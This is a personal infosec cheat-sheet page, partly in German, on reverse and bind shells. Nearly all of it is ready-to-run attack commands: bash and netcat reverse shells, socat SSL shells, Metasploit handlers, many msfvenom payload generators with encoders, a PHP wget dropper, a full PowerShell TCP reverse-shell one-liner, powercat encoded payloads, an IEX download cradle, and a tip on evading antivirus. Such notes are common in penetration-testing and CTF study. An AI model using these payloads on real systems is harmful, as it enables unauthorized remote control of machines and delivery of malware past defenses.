akde/infosec

Information security is ultimately about managing risk

Reverse Shell ALT

, , , , 
IF THE METERPRETER SHELL STUCKS, TRY TO ENTER ENTER MULTIPLE TIMES ON THE VICTIM.

Aufbauen

  •  Lausche auf einem Sys­tem, dass erre­icht wer­den kann z.B. mit
nc -lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution]
  • Ini­ti­iere dann die Verbindung vom Ziel­sys­tem. Hier ein Beispiel direkt in PHP:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?>
Anderes Beispiel, z.B. direkt in ein­er Kon­sole aus­führbar: 
nc -e /bin/sh 10.0.3.4 4444
Inter­est­ing oth­er approach e.g. if nc. does­n’t has the ‑e flag: 
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc $attackerip 4444 1>/tmp/backpipe

Verbessern

rlwrap verbessert die Shell: 
rlwrap nc ...

With socat and SSL

First, cre­ate a cer­tifi­cate and com­bine it into a PEM file. 
openssl req -newkey rsa:4096 -nodes -keyout bind_shell.key -x509 -days 42 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem

Reverse shell on Linux, receiving on Windows

Then, bind a shell on Lin­ux 
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
And open it from Wind­wows 
socat.exe - OPENSSL:192.168.119.158,verify=0

Reverse shell on Windows, receiving on Linux

Open the lis­ten­er on Win­dows 
socat.exe OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:'cmd.exe',pipes
Open it from Lin­ux 
socat - OPENSSL:192.168.119.158:443,verify=0

Windows

  1. Upload nc.exe
  2. Local: Start lis­ten­er like 
    1. rlwrap nc -lvp 4444
  3. Remote: export shell like 
    1. nc.exe -e cmd.exe 10.10.14.37 4444
Alternative 
  1. Upload nc.exe
  2. Vic­tim: Start the net­cat lis­ten­er 
    nc -dLp 4444 -e cmd.exe
  3. Local: in Metas­ploit: 
    use multi/handler
set LPORT 4444
set RHOST $victim
set PAYLOAD payload/windows/x64/shell_bind_tcp
run

Mögliche Probleme

Wenn in ein­er Reverse-Shell die Pass­wort-Eingabe nicht klappt…  
sudo: no tty present and no askpass program specified
… muss eine TTY shell aufgemacht wer­den. Möglichkeiten: 

Generate

Bina­ry exe­cutable for Linux:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.37 LPORT=4455 -f elf > shell.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.37 LPORT=4455 -f elf > shell.elf
Bina­ry meter­preter exe­cutable for Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.37 LPORT=4455 -f elf > shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.37 LPORT=4455 -f elf > shell.elf
Perl reverse shell
msfvenom -p cmd/unix/reverse_perl LHOST=10.11.0.174 LPORT=4444 -f raw
Python reverse shell
msfvenom -p cmd/unix/reverse_python LHOST=10.11.0.174 LPORT=4444 -f raw
PHP reverse shell
msfvenom -p php/reverse_php LHOST=10.11.0.174 LPORT=4444 -f raw
PHP meter­preter (Should this not work because a shell in meter­preter won’t work, use nc to export the bash to a local nc listener.)
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.11.0.174 LPORT=4444 -f raw
ASP-Reverse-Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.158 LPORT=4444 -f asp > s.asp
Tomcat/WAR reverse shell
msfven­om ‑p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> ‑f war > shell.war
Pow­er­Shell reverse shell
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.119.158 LPORT=443 -f psh --out reverse_shell.ps1
(If this does­n’t work, use the make_reverse_powershell.py script or the orig­i­nal from here.)
JSP reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.158 LPORT=443 -f raw > rs.jsp
Dann mit Metasploit:
> use multi/handler
> set PAYLOAD php/meterpreter/reverse_tcp
> set LHOST 10.10.10.10
> set LPORT 4444
> exploit
Hex out­put: use ‑hex h.hex param

Windows

Win­dows reverse shell for metasploit:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.14.37 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/p32.exe
msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=10.10.14.37 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/p64.exe
Win­dows bind shell (needs to have run­ning nc ‑lvp 443)
msfvenom -p windows/shell_reverse_tcp lhost=192.168.119.158 lport=443 -f exe > root.exe
Win­dows reverse meter­preter shell for metasploit:
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.119.158 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/p32.exe
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.37 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/p64.exe
Win­dows reverse shell for nc:
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.119.158 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o p32.exe
msfvenom -a x64 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.119.158 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o p64.exe
If all of this does­n’t work, switch to nc binding!
Oth­er sources for web shells: https://tools.kali.org/maintaining-access/webshells
Use GreatSCT if you have prob­lems with anti-virus solutions.

PHP

Cle­vere Idee: Nur Down­load verur­sachen bei Aus­führung, dann ist die Datei irgend­wo vor Ort.
<?php system("/usr/local/bin/wget http://10.11.0.174/r.php -O /usr/local/www/apache24/data/r.php") ?>

PowerShell

Lis­ten nor­mal­ly with nc, then, on the vic­tim you can start a reverse shell han­dler natively:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.T ext.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII ).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c lient.Close()"
Alter­na­tive: Use Pow­er­cat on an own sys­tem. Cre­ate encod­ed reverse shell code as follows: 
powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell. ps1
Start now a nc lis­ten­er as usu­al. Then, on the vic­tim, just exe­cute the base64 encod­ed code: 
powershell.exe -E ZgB1AG4AYwB0AGkAb...

Unicorn

Cre­ate reverse shell code 
unicorn.py windows/meterpreter/reverse_http $local_ip $local_port
This cre­ates a powershell_attack.txt.
  1. Copy this file togeth­er with unicorn.rc in a directory.
  2. Start metas­ploit with msf­con­sole ‑r unicorn.rc
  3. In anoth­er ter­mi­nal, start a web serv­er which can deliv­er the powershell_attack.txt file
  4. On the vic­tim, exe­cute the following 
    1. pow­er­shell “IEX(New-Object Net.webclient).downloadstring(‘http://local:port/powershell_attack.txt’)”
  5. A shell is not open in Metasploit.

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';